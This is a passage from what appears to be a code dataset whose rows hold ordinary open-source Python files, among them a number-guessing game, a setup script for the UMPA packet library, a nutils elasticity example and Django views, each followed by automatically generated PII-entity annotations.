dificulty do you want to play in?' + dificulty = raw_input('choose between ""easy"", ""medium"" or ""hard"":\n') + dificulties = 'easy', 'medium', 'hard' + #if anybody tries to be smart: help them get it right + wrong = -1 + if dificulty in dificulties: wrong = 0 + elif dificulty not in dificulties: + wrong += 1 + for n in (1,2,3): + if n == 3: + print ""\nseems like you can't handle choosing a dificulty..."" + dificulty = ""easy"" + time.sleep(2) + print """" + elif (dificulty not in dificulties): + print 'something went wrong!!! please try again\n' + dificulty = raw_input('choose between ""easy"", ""medium"" or ""hard"":\n') + wrong += 1 + elif dificulty in dificulties: + print ""\nalright so let's get started :D\n"" + break + else: + print ""you're doing something wrong! I'll chooce a dificulty for you\a\a\a\a\n"" + dificulty = 'easy' + print ""ERROR: 008"" + time.sleep(2) + else: + print '\a\a\asomething went wrong the program will shutdown.' + print ""ERROR: 009"" + time.sleep(2.5) + sys.exit() + return dificulty + +#so here a random number will be choosen depending of the dificulty +def random_number(dificulty, list_easy, list_medium, list_hard): + if dificulty == 'easy': + NUMBER = random.randrange(100) + 1 + print ""you have choosen the dificulty easy."" + number_range = '1 and 100: ' + numbers = list_easy + elif dificulty == 'medium': + NUMBER = random.randrange(200) + 1 + print ""you have choosen the dificulty medium."" + number_range = '1 and 200: ' + numbers = list_medium + elif dificulty =='hard': + NUMBER = random.randrange(-200,201) + print ""you have choosen the dificulty hard."" + number_range = '-200 and 200: ' + numbers = list_hard + else: + print ""dificulty malfunction"" + print ""ERROR: 003"" + time.sleep(2.5) + exit() + return NUMBER, number_range, numbers + +# if the guess != ""the (predefined) number"": loop. +def game(dificulty, NUMBER, number_range, numbers): + time.sleep(2.5) + os.system('cls') + guesses=0 + guess='nothing' + while guess != NUMBER: + if guess == 'nothing': + print 'guess a number between', number_range + try: + guess = input() + except: + print ""\nsomething went wrong\nyou're getting another try\n\n"" + continue + guesses += 1 + elif guess == 'cheater': + guess = NUMBER + elif guess not in numbers: + print ""\nthe guess you made isn't in the range of valid numbers.\nAre you sure you want to make this guess?"" + answ = raw_input(""'yes'/'no' \n"") + if answ == 'yes': + print ""it's your funeral"" + print '\nnguess a number between', number_range + guesses += 1 + elif answ == 'no': + print ""good choice"" + print '\nguess a number between', number_range + try: + guess = input() + except: + print ""something went wrong\nyou're getting another try\n"" + continue + else: + print ""that isn't a valid option"" + print ""let's continue\n"" + #if the number is higher than the guess + elif guess < NUMBER: + print 'higher...' + print '\nguess a number between', number_range + try: + guess = input() + except: + print ""something went wrong\nyou're getting another try\n"" + continue + guesses += 1 + continue + #if the number is 'lower...' + elif guess > NUMBER: + print 'lower...' + print '\nguess a number between', number_range + try: + guess = input() + except: + print ""something went wrong\n you'll get another try"" + continue + guesses -= 1 + guesses += 1 + #this is actually an error that will never occur... but better safe than sorry. + else: + print '\a\a\asorry, something went wrong. The game will now end itself.' + sys.exit() + print + print 'you did it the NUMBER was: ', NUMBER, + print 'it cost you ', guesses, 'guesses to get it right', 'on dificulty', dificulty + print + return guesses + +##Here I will use the 'os' module to keep a highscore system +#in the default appdata of the users profile. +#everything here is to see if everything is alright in it's place. +def highscore(dificulty,guesses): + FOLDER_LOCALAPPDATA = os.environ['LOCALAPPDATA'] + FOLDER_NUMBER_GAME = FOLDER_LOCALAPPDATA + '\\Number_game' + #deciding if a new highscore file and/or dir is needed + if os.access(FOLDER_NUMBER_GAME, 0) == False: #dir + try: + os.mkdir(FOLDER_NUMBER_GAME) + except: + os.system('cls') + print 'creating folder: ERROR\nError code: 002' + os.system('pause') + sys.exit() + try: + HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\highscores.dat"", ""w+"") + easy_highscores={} + medium_highscores={} + hard_highscores={} + all_highscores = [easy_highscores,medium_highscores,hard_highscores] + pickle.dump(all_highscores,HIGHSCORES_DAT) + HIGHSCORES_DAT.close() + HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\highscores.dat"", ""r+"") + unpickled_file = pickle.load(HIGHSCORES_DAT) + + except: + os.system('cls') + print 'loading file: ERROR\nError code: 001' + os.system('pause') + sys.exit() + else: + HIGHSCORES_DAT.close() + + + #done with file and folder creation + # + #showing highscores + + HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\highscores.dat"", ""r"") + try: + unpickled_file = pickle.load(HIGHSCORES_DAT) + except: + print ""couldn't locate or unpickle file"" + print ""ERROR: 005"" + print ""\n if this was your first run of the game: this is common"" + print ""if not, please send a message at dummy@email.com, thank you"" + time.sleep(1) + print ""everything went worse then expected. shutting down"" + time.sleep(2.5) + sys.exit() + + else: + HIGHSCORES_DAT.close() + + if dificulty == ""easy"": l=0 + if dificulty == ""medium"": l=1 + if dificulty == ""hard"": l=2 + highscores = unpickled_file[l] + + #creating your highscore... + your_name = raw_input('what is your name?: ') + try: + if highscores[your_name]>guesses: + os.system('cls') + print ""congratulations, new highscore!!"" + if raw_input('do you want to replace your score yes/no: ') ==""yes"": highscores[your_name]=guesses + except: + print ""new user"" + highscores[your_name]=guesses + + list_keys= highscores.keys() + list_values= highscores.values() + + list_values.sort() + + time.sleep(4) + os.system('cls') + #deeply annoying part + #highscore display + print"" ---HIGHSCORE---"" + print ""highscores in"", dificulty,""dificulty"" + print""\nname attempts"" + print""----------------------------------------"" + i=0 + #for values in sorted values list + for n in list_values: + #reset found to find next highscore + found = False + #set p to 0: to try different keys + p=0 + #while the matching key and value not found keep looking + while found != True: + #m = the next key in list + m=list_keys[p] + if highscores[m] == n: found=True + p+=1 + b=len(m) + b=21-b + print m,' '*b,highscores[m] + + HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\highscores.dat"", ""r"") + unpickled_file = pickle.load(HIGHSCORES_DAT) + HIGHSCORES_DAT.close() + if l==0: unpickled_file[0]=highscores + if l==1: unpickled_file[1]=highscores + if l==2: unpickled_file[2]=highscores + HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\highscores.dat"", ""w"") + pickle.dump(unpickled_file,HIGHSCORES_DAT) + HIGHSCORES_DAT.close() + +def end(): + time.sleep(1) + print(''' + The number Game V4 + Copyright (C) 2012 Saikia81 + ''') + time.sleep(5) + os.system('cls') + print("""""" + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + """""") + time.sleep(7) + try: + if pygame.mixer.get_busy()>0: + try: + pygame.mixer.music.fadeout(3000) + except: + print ""ERROR: 012"" + except: + pass + time.sleep(3) + os.system('pause') + sys.exit() + +def main(): + #initializing + ask_music = raw_input('music ""on""?: ') + if (ask_music == 'on') or (ask_music == 'yes'): + try: + import pygame.mixer + pygame.mixer.init() + pygame.mixer.music.load(""song.mp3"") + pygame.mixer.music.play(-1) + except: + print ""pygame not working!\nError: 013"" + os.system('cls') + list_easy, list_medium, list_hard = list_numbers() + dificulty = None + instructions() + while 1: + dificulty=change_dificulty(dificulty) + NUMBER, number_range, numbers = random_number(dificulty, list_easy, list_medium, list_hard) + guesses = game(dificulty, NUMBER, number_range, numbers) + highscore(dificulty,guesses) + + ask_again = raw_input('\ndo you want to play again? yes/no: ') + os.system('cls') + if ask_again == 'no': end() + +#start +main() +",11829,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', 'april 2012'], ['LOCATION', 'list_easy'], ['LOCATION', 'game(dificulty'], ['PERSON', 'list_values= highscores.values'], ['PERSON', 'list_values.sort'], ['DATE_TIME', '2012'], ['LOCATION', 'list_easy'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'os.sy'], ['URL', 'os.ac'], ['URL', 'os.mk'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'DAT.cl'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'DAT.cl'], ['URL', 'email.com'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'DAT.cl'], ['URL', 'os.sy'], ['URL', 'highscores.ke'], ['URL', 'highscores.va'], ['URL', 'values.so'], ['URL', 'time.sl'], ['URL', 'os.sy'], ['URL', 'DAT.cl'], ['URL', 'DAT.cl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'os.sy'], ['URL', 'time.sl'], ['URL', 'pygame.mixer.ge'], ['URL', 'pygame.mixer.mu'], ['URL', 'time.sl'], ['URL', 'os.sy'], ['URL', 'pygame.mixer.in'], ['URL', 'pygame.mixer.mu'], ['URL', 'song.mp'], ['URL', 'pygame.mixer.music.pl'], ['URL', 'os.sy'], ['URL', 'os.sy']]" +25,"#!/usr/bin/env python +# -*- coding: utf-8 -*- + +# Copyright (C) 2008-2009 Adriano Monteiro Marques. +# +# Author: Bartosz SKOWRON +# +# This library is free software; you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License as published +# by the Free Software Foundation; either version 2.1 of the License, or +# (at your option) any later version. +# +# This library is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY +# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public +# License for more details. +# +# You should have received a copy of the GNU Lesser General Public License +# along with this library; if not, write to the Free Software Foundation, +# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + +import glob +import os +import os.path +from stat import ST_MODE +from distutils.core import setup +from distutils.command.install import install + +UMPA_VERSION = '0.2' +SHARE_DIR = os.path.join('share', 'umpa') +DOCS_DIR = os.path.join('share', 'doc', 'umpa') + +TESTS_DIR = [ + os.path.join('tests'), + os.path.join('tests', 'system'), + os.path.join('tests', 'system', 'test_snd'), + os.path.join('tests', 'system', 'test_sndrcv'), + os.path.join('tests', 'a_unit'), + os.path.join('tests', 'a_unit', 'test_extensions'), + os.path.join('tests', 'a_unit', 'test_protocols'), + os.path.join('tests', 'a_unit', 'test_utils'), + os.path.join('tests', 'a_unit', 'test_sniffing'), + os.path.join('tests', 'a_unit', 'test_sniffing', 'test_libpcap'), +] + +class umpa_install(install): + def run(self): + install.run(self) + self.create_uninstaller() + + def create_uninstaller(self): + uninstaller_filename = os.path.join( + self.install_data, SHARE_DIR, 'uninstall_umpa') + uninstaller = [] + uninstaller.append( + ""#!/usr/bin/env python\n"" + ""import os, sys, shutil\n"" + ""\n"" + ""print\n"" + ""print '%(line)s Uninstall UMPA %(version)s %(line)s'\n"" + ""print\n"" + ""\n"" + ""answer = raw_input('Are you sure that you want to '\n"" + "" 'completly uninstall UMPA %(version)s? (yes/no) ')\n"" + ""\n"" + ""if answer.lower() not in ['yes', 'y']:\n"" + "" sys.exit(0)\n"" + ""\n"" + ""print\n"" + ""print '%(line)s Uninstalling UMPA %(version)s... %(line)s'\n"" + ""print\n"" % {'version': UMPA_VERSION, 'line': '-' * 10}) + + for output in self.get_outputs(): + uninstaller.append( + 'print ""Removing %(output)s...""\n' + 'if os.path.exists(""%(output)s""):\n' + ' os.remove(""%(output)s"")\n' % {'output': output}) + + uninstaller.append( + ""print 'Removing uninstaller itself...'\n"" + ""os.remove('%s')\n"" % uninstaller_filename) + + uninstaller.append('print ""Removing empty directories...""\n') + for dir in ( + os.path.join(self.install_data, SHARE_DIR), + os.path.join(self.install_data, DOCS_DIR), + os.path.join(self.install_lib, 'umpa'), + ): + uninstaller.append( + 'if os.path.exists(""%(dir)s""):\n' + ' shutil.rmtree(""%(dir)s"")\n' % {'dir' : dir}) + + uninstaller_file = open(uninstaller_filename, 'w') + uninstaller_file.writelines(uninstaller) + uninstaller_file.close() + + # Set exec bit for uninstaller + mode = ((os.stat(uninstaller_filename)[ST_MODE]) | 0555) & 07777 + os.chmod(uninstaller_filename, mode) + +cmdclasses = { + 'install' : umpa_install, + } + +test_files = [] +for dir in TESTS_DIR: + test_files = test_files + [ (os.path.join(SHARE_DIR, dir), + glob.glob(os.path.join(dir,'*.py')))] + +data_files = [ (os.path.join(SHARE_DIR,'examples'), + glob.glob(os.path.join('examples','*'))), + (os.path.join(DOCS_DIR,'API'), + glob.glob(os.path.join('docs','API','*'))), + (os.path.join(DOCS_DIR,'tutorials','_sources'), + glob.glob(os.path.join('docs','tutorials','_sources','*'))), + (os.path.join(DOCS_DIR,'tutorials','_static'), + glob.glob(os.path.join('docs','tutorials','_static','*'))), + (os.path.join(DOCS_DIR,'tutorials'), + glob.glob(os.path.join('docs','tutorials','*.*'))), + (SHARE_DIR, ('run_tests.sh', 'run_tests.bat')), + (DOCS_DIR, + ('README', 'COPYING', 'AUTHORS', 'TODO', 'CHANGES', + 'INSTALL')), + (os.path.join(SHARE_DIR, 'tests'), + (os.path.join('tests','README'), + os.path.join('tests','IMPORTANT'))), + ] + test_files + +setup( name = ""UMPA"", + version = UMPA_VERSION, + description = ""Umit's Manipulations of Packets Art"", + author = ""Bartosz SKOWRON"", + author_email = dummy@email.com"", + url = ""http://www.umpa.umitproject.org"", + license = ""GNU LGPLv2"", + platforms = [""Platform Independent""], + packages = [ ""umit"", + ""umit.umpa"", + ""umit.umpa.protocols"", + ""umit.umpa.sniffing"", + ""umit.umpa.sniffing.libpcap"", + ""umit.umpa.extensions"", + ""umit.umpa.utils"", + ], + data_files = data_files, + cmdclass = cmdclasses, +) +",5889,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'http://www.umpa.umitproject.org'], ['DATE_TIME', '2008-2009'], ['PERSON', 'Adriano Monteiro Marques'], ['PERSON', 'Bartosz SKOWRON'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['PERSON', 'UMPA'], ['LOCATION', 'version)s'], ['PERSON', 'UMPA'], ['LOCATION', 'version)s'], ['PERSON', 'answer.lower'], ['LOCATION', 'version)s'], ['PERSON', 'TODO'], ['PERSON', 'Umit'], ['PERSON', 'Bartosz SKOWRON'], ['URL', 'os.pa'], ['URL', 'distutils.co'], ['URL', 'distutils.command.in'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'install.ru'], ['URL', 'self.cr'], ['URL', 'os.path.jo'], ['URL', 'self.in'], ['URL', 'self.ge'], ['URL', 'os.pa'], ['URL', 'os.re'], ['URL', 'os.re'], ['URL', 'os.path.jo'], ['URL', 'self.in'], ['URL', 'os.path.jo'], ['URL', 'self.in'], ['URL', 'os.path.jo'], ['URL', 'self.in'], ['URL', 'os.pa'], ['URL', 'file.cl'], ['URL', 'os.st'], ['URL', 'os.ch'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'tests.sh'], ['URL', 'tests.ba'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'email.com'], ['URL', 'umit.umpa.pro'], ['URL', 'umit.umpa.sn'], ['URL', 'umit.umpa.sniffing.li']]" +26,"#! /usr/bin/env python3 +# +# In this script we solve the linear elasticity problem on a unit square +# domain, clamped at the left boundary, and stretched at the right boundary +# while keeping vertical displacements free. + +from nutils import mesh, function, solver, export, cli, testing + +def main(nelems:int, etype:str, btype:str, degree:int, poisson:float): + ''' + Horizontally loaded linear elastic plate. + + .. arguments:: + + nelems [10] + Number of elements along edge. + etype [square] + Type of elements (square/triangle/mixed). + btype [std] + Type of basis function (std/spline), with availability depending on the + configured element type. + degree [1] + Polynomial degree. + poisson [.25] + Poisson's ratio, nonnegative and strictly smaller than 1/2. + ''' + + domain, geom = mesh.unitsquare(nelems, etype) + + ns = function.Namespace() + ns.x = geom + ns.basis = domain.basis(btype, degree=degree).vector(2) + ns.u_i = 'basis_ni ?lhs_n' + ns.X_i = 'x_i + u_i' + ns.lmbda = 2 * poisson + ns.mu = 1 - 2 * poisson + ns.strain_ij = '(d(u_i, x_j) + d(u_j, x_i)) / 2' + ns.stress_ij = 'lmbda strain_kk δ_ij + 2 mu strain_ij' + + sqr = domain.boundary['left'].integral('u_k u_k J(x)' @ ns, degree=degree*2) + sqr += domain.boundary['right'].integral('(u_0 - .5)^2 J(x)' @ ns, degree=degree*2) + cons = solver.optimize('lhs', sqr, droptol=1e-15) + + res = domain.integral('d(basis_ni, x_j) stress_ij J(x)' @ ns, degree=degree*2) + lhs = solver.solve_linear('lhs', res, constrain=cons) + + bezier = domain.sample('bezier', 5) + X, sxy = bezier.eval(['X', 'stress_01'] @ ns, lhs=lhs) + export.triplot('shear.png', X, sxy, tri=bezier.tri, hull=bezier.hull) + + return cons, lhs + +# If the script is executed (as opposed to imported), :func:`nutils.cli.run` +# calls the main function with arguments provided from the command line. For +# example, to keep with the default arguments simply run :sh:`python3 +# elasticity.py`. To select mixed elements and quadratic basis functions add +# :sh:`python3 elasticity.py etype=mixed degree=2`. + +if __name__ == '__main__': + cli.run(main) + +# Once a simulation is developed and tested, it is good practice to save a few +# strategic return values for regression testing. The :mod:`nutils.testing` +# module, which builds on the standard :mod:`unittest` framework, facilitates +# this by providing :func:`nutils.testing.TestCase.assertAlmostEqual64` for the +# embedding of desired results as compressed base64 data. + +class test(testing.TestCase): + + @testing.requires('matplotlib') + def test_default(self): + cons, lhs = main(nelems=4, etype='square', btype='std', degree=1, poisson=.25) + with self.subTest('constraints'): self.assertAlmostEqual64(cons, ''' + eNpjYMACGsiHP0wxMQBKlBdi''') + with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, ''' + eNpjYMAEKcaiRmLGQQZCxgwMYsbrzqcYvz672KTMaIKJimG7CQPDBJM75xabdJ3NMO0xSjG1MUw0Beox + PXIuw7Tk7A/TXqMfQLEfQLEfQLEfpsVnAUzzHtI=''') + + @testing.requires('matplotlib') + def test_mixed(self): + cons, lhs = main(nelems=4, etype='mixed', btype='std', degree=1, poisson=.25) + with self.subTest('constraints'): self.assertAlmostEqual64(cons, ''' + eNpjYICCBiiEsdFpIuEPU0wMAG6UF2I=''') + with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, ''' + PI:KEY + PI:KEY''') + + @testing.requires('matplotlib') + def test_quadratic(self): + cons, lhs = main(nelems=4, etype='square', btype='std', degree=2, poisson=.25) + with self.subTest('constraints'): self.assertAlmostEqual64(cons, ''' + eNpjYCACNIxc+MOUMAYA/+NOFg==''') + with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, ''' + eNqFzLPI:KEY + PI:KEY + PI:KEY + PI:KEY + PI:KEY''') + + @testing.requires('matplotlib') + def test_poisson(self): + cons, lhs = main(nelems=4, etype='square', btype='std', degree=1, poisson=.4) + with self.subTest('constraints'): self.assertAlmostEqual64(cons, ''' + eNpjYMACGsiHP0wxMQBKlBdi''') + with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, ''' + eNpjYMAEFsaTjdcYvTFcasTAsMZI5JyFce6ZKSavjbNMFhhFmDAwZJkknJ1iInom0ZTJJNx0q1GgKQND + uKn32UTTf6d/mLKY/DDdZvQDKPbD1OvsD9M/pwGZyh9l''') +",4221,"[['PERSON', ""ns.u_i = '""], ['PERSON', 'basis_ni'], ['PERSON', ""X_i = 'x_i""], ['PERSON', 'd(u_i'], ['PERSON', 'sqr'], ['PERSON', 'sqr'], ['PERSON', ""bezier = domain.sample('bezier'""], ['PERSON', ""sxy = bezier.eval(['X'""], ['LOCATION', 'TestCase'], ['IP_ADDRESS', '::\n\n '], ['URL', 'function.Na'], ['URL', 'ns.ba'], ['URL', 'domain.ba'], ['URL', 'ns.mu'], ['URL', 'ns.st'], ['URL', 'ns.st'], ['URL', 'domain.bo'], ['URL', 'domain.bo'], ['URL', 'domain.int'], ['URL', 'solver.so'], ['URL', 'domain.sa'], ['URL', 'export.tr'], ['URL', 'shear.pn'], ['URL', 'bezier.tr'], ['URL', 'bezier.hu'], ['URL', 'nutils.cli.ru'], ['URL', 'elasticity.py'], ['URL', 'elasticity.py'], ['URL', 'cli.ru'], ['URL', 'nutils.testing.TestCase.as'], ['URL', 'testing.re'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'testing.re'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'testing.re'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'testing.re'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'self.su'], ['URL', 'self.as']]" +27,"import json +import random +import datetime + +from codalib import APP_AUTHOR +from codalib.bagatom import wrapAtom, makeObjectFeed +from dateutil import parser +from django.conf import settings +from django.contrib.sites.models import Site +from django.contrib.syndication.views import Feed +from django.core.paginator import Paginator +from django.http import HttpResponse, HttpResponseNotFound +from django.shortcuts import get_object_or_404, render +from django.utils.feedgenerator import Atom1Feed +from lxml import etree + +from django.views.generic import ListView + +from .models import Validate + + +XML_HEADER = b""\n%s"" + + +class CorrectMimeTypeFeed(Atom1Feed): + mime_type = 'application/xml' + + +class AtomNextNewsFeed(Feed): + """""" + next view. + an atom pub representation of the next validation to occur. + should be a single item. + """""" + + feed_type = Atom1Feed + link = ""/validate/next/"" + title = ""UNT Coda Validate App"" + subtitle = ""The highest priority validation item"" + reason = 'None' + author_name = APP_AUTHOR.get('name', None) + author_link = APP_AUTHOR.get('uri', None) + feed_type = CorrectMimeTypeFeed + + def get_object(self, request, server): + if server: + return server + else: + return None + + def items(self, obj): + # need to filter by server first, if provided + reason = '' + if obj: + validations = Validate.objects.all().filter(server=obj) + reason = 'This selection was filtered to only consider \ + server %s. ' % obj + else: + validations = Validate.objects.all() + # next check if we have any with a priority above 0 + v = validations.filter( + priority__gt=0).order_by('priority_change_date') + if v.exists(): + reason += 'Item was chosen because it is the \ +oldest prioritized.' + # if set is empty, go with any priority with last_verified older than + # settings.VALIDATION_PERIOD + else: + # It might seem natural to use django's built-in random ordering, + # but that technique becomes slow when using large sets + # because 'order by ?' is very expensive against MySQL dbs. + # v = Validate.objects.all().filter( + # last_verified__gte=datetime.datetime.now() - + # settings.VALIDATION_PERIOD + # ).order_by('?') + # instead, let's do this: + # http://elpenia.wordpress.PI:KEY + now = datetime.datetime.now() + v = validations.filter( + last_verified__lte=now - settings.VALIDATION_PERIOD + ) + if v.exists(): + random_slice = int(random.random() * v.count()) + v = v[random_slice:] + reason += 'Item was randomly selected and within the \ +past year because there is no prioritized record.' + # if that set has no objects, pick the oldest verified item. + else: + v = validations.order_by('last_verified') + reason += 'Item was chosen because there \ +is no prioritized record and it had not been validated in the longest \ +duration of time.' + self.reason = reason + return v[:1] + + def item_title(self, item): + return item.identifier + + def item_description(self, item): + return self.reason + + def item_link(self, item): + return '/APP/validate/%s/' % item.identifier + + +# for some reason, I couldn't get AtomNextFeed to work without a server +# I don't think optional arguments are supported for class-based syndication +# feeds, so I have this work around to make it work. +class AtomNextFeedNoServer(AtomNextNewsFeed): + def get_object(self, request): + pass + + +def index(request): + context = { + 'recently_prioritized': Validate.objects.filter( + priority__gt=0).order_by('-priority_change_date')[:20], + 'recently_verified': Validate.objects.all().order_by('-last_verified')[:20], + 'verified_counts': Validate.objects.last_verified_status_counts() + } + + return render(request, 'coda_validate/index.html', context) + + +def last_day_of_month(year, month): + """""" Work out the last day of the month """""" + last_days = [31, 30, 29, 28, 27] + for i in last_days: + try: + end = datetime.datetime(year, month, i) + except ValueError: + continue + else: + return end.day + return None + + +def stats(request): + """""" + stats page + """""" + if not Validate.objects.exists(): + return render( + request, + 'coda_validate/stats.html', + { + 'sums_by_date': {}, + 'validations': None, + 'this_month': None, + 'last_24h': None, + 'last_vp': None, + 'unverified': 0, + 'passed': 0, + 'failed': 0, + 'validation_period': '%s days' % str( + settings.VALIDATION_PERIOD.days + ), + } + ) + # resolve the range for last month filter + today = datetime.date.today() + first = datetime.date(day=1, month=today.month, year=today.year) + last_day = last_day_of_month(first.year, first.month) + this_month_range = [ + '%s-%s-01 00:00:00' % (first.year, first.month), + '%s-%s-%s 23:59:59' % (first.year, first.month, last_day), + ] + # resolve the range for last 24 hours filter + now = datetime.datetime.now() + twenty_four_hours_ago = now - datetime.timedelta(hours=24) + since_validation_period = now - datetime.timedelta( + days=settings.VALIDATION_PERIOD.days) + # make a set of data that makes sense for the heatmap + result_counts = Validate.objects.last_verified_status_counts() + total = sum(result_counts.values()) + sums_by_date = Validate.sums_by_date() + sums_by_date_g = {} + years = set() + for dt, ct in sums_by_date.items(): + y, m, d = dt + dt = (y, m - 1, d) + sums_by_date_g[dt] = ct + years.add(y) + sums_by_date = sums_by_date_g + num_years = len(years) + return render( + request, + 'coda_validate/stats.html', + { + 'sums_by_date': dict((('%d, %d, %d' % s, c) + for s, c in sums_by_date.items())), + 'num_years': num_years, + 'validations': total, + 'this_month': Validate.objects.filter( + last_verified__range=this_month_range).count(), + 'last_24h': Validate.objects.filter( + last_verified__range=[twenty_four_hours_ago, now]).count(), + 'last_vp': Validate.objects.filter( + last_verified__range=[since_validation_period, now]).count(), + 'unverified': result_counts.get('Unverified'), + 'passed': result_counts.get('Passed'), + 'failed': result_counts.get('Failed'), + 'validation_period': '%s days' % str(settings.VALIDATION_PERIOD.days), + } + ) + + +def prioritize(request): + """""" + prioritize view + """""" + + identifier = request.GET.get('identifier') + prioritized = False + if identifier: + v = get_object_or_404(Validate, identifier=identifier) + v.priority = 1 + v.priority_change_date = datetime.datetime.now() + v.save() + prioritized = True + return render( + request, + 'coda_validate/prioritize.html', + { + 'identifier': identifier, + 'prioritized': prioritized, + } + ) + + +def validate(request, identifier): + """""" + prioritize view + """""" + + # this view always gets an identifier, if it's wrong, 404 + v = get_object_or_404(Validate, identifier=identifier) + # clicked priority button on validate detail page + p = request.GET.get('priority') + if p == '1': + v.priority = 1 + v.priority_change_date = datetime.datetime.now() + v.save() + return render( + request, + 'coda_validate/validate.html', + { + 'validate': v, + } + ) + + +def prioritize_json(request): + """""" + prioritize json view + """""" + + DOMAIN = Site.objects.get_current().domain + identifier = request.GET.get('identifier') + json_dict = {} + json_dict['status'] = 'failure' + status = 404 + if identifier: + json_dict['requested_identifier'] = identifier + try: + v = Validate.objects.get(identifier=identifier) + except Exception: + v = None + if v: + v.priority = 1 + v.priority_change_date = datetime.datetime.now() + v.save() + json_dict['status'] = 'success' + json_dict['priority'] = v.priority + json_dict['priority_change_date'] = str(v.priority_change_date) + json_dict['atom_pub_url'] = '%s/APP/validate/%s' % \ + (DOMAIN, v.identifier) + status = 200 + else: + json_dict['response'] = 'identifier was not found' + json_dict['requested_identifier'] = identifier + else: + json_dict['response'] = 'missing identifier parameter' + json_dict['requested_identifier'] = '' + status = 400 + response = HttpResponse(content_type='application/json', status=status) + json.dump( + json_dict, + fp=response, + indent=4, + sort_keys=True, + ) + return response + + +def validateToXML(validateObject): + """""" + This is the reverse of xmlToValidateObject. + Given a ""Validate"" object, it generates an + XML object representative of such. + """""" + + # define namespace + validate_namespace = ""http://digital2.library.unt.edu/coda/validatexml/"" + val = ""{%s}"" % validate_namespace + validate_nsmap = {""validate"": validate_namespace} + + # build xml from object and return + XML = etree.Element(""{0}validate"".format(val), nsmap=validate_nsmap) + + label = etree.SubElement(XML, ""{0}identifier"".format(val)) + label.text = validateObject.identifier + + last_verified = etree.SubElement(XML, ""{0}last_verified"".format(val)) + last_verified.text = validateObject.last_verified.isoformat() + + last_verified_status = etree.SubElement(XML, ""{0}last_verified_status"".format(val)) + last_verified_status.text = validateObject.last_verified_status + + priority_change_date = etree.SubElement(XML, ""{0}priority_change_date"".format(val)) + priority_change_date.text = validateObject.priority_change_date.isoformat() + + priority = etree.SubElement(XML, ""{0}priority"".format(val)) + priority.text = str(validateObject.priority) + + server = etree.SubElement(XML, ""{0}server"".format(val)) + server.text = validateObject.server + + return XML + + +def xmlToValidateObject(validateXML): + """""" + Parse the XML in a POST request and create the validate object + """""" + + entryRoot = etree.XML(validateXML) + if entryRoot is None: + raise ValueError(""Unable to parse uploaded XML"") + # parse XML + contentElement = entryRoot.xpath(""*[local-name() = 'content']"")[0] + validateXML = contentElement.xpath(""*[local-name() = 'validate']"")[0] + identifier = validateXML.xpath( + ""*[local-name() = 'identifier']"")[0].text.strip() + + last_verified = validateXML.xpath( + ""*[local-name() = 'last_verified']"")[0].text.strip() + last_verified = parser.parse(last_verified) + + last_verified_status = validateXML.xpath( + ""*[local-name() = 'last_verified_status']"")[0].text.strip() + + priority_change_date = validateXML.xpath( + ""*[local-name() = 'priority_change_date']"")[0].text.strip() + priority_change_date = parser.parse(priority_change_date) + + priority = validateXML.xpath( + ""*[local-name() = 'priority']"")[0].text.strip() + + server = validateXML.xpath(""*[local-name() = 'server']"")[0].text.strip() + + # make the object and return + validate = Validate( + identifier=identifier, + last_verified=last_verified, + last_verified_status=last_verified_status, + priority_change_date=priority_change_date, + priority=priority, + server=server, + ) + return validate + + +def xmlToUpdateValidateObject(validateXML): + """""" + Parse the XML in a PUT request and adjust the validate based on that + *ONLY 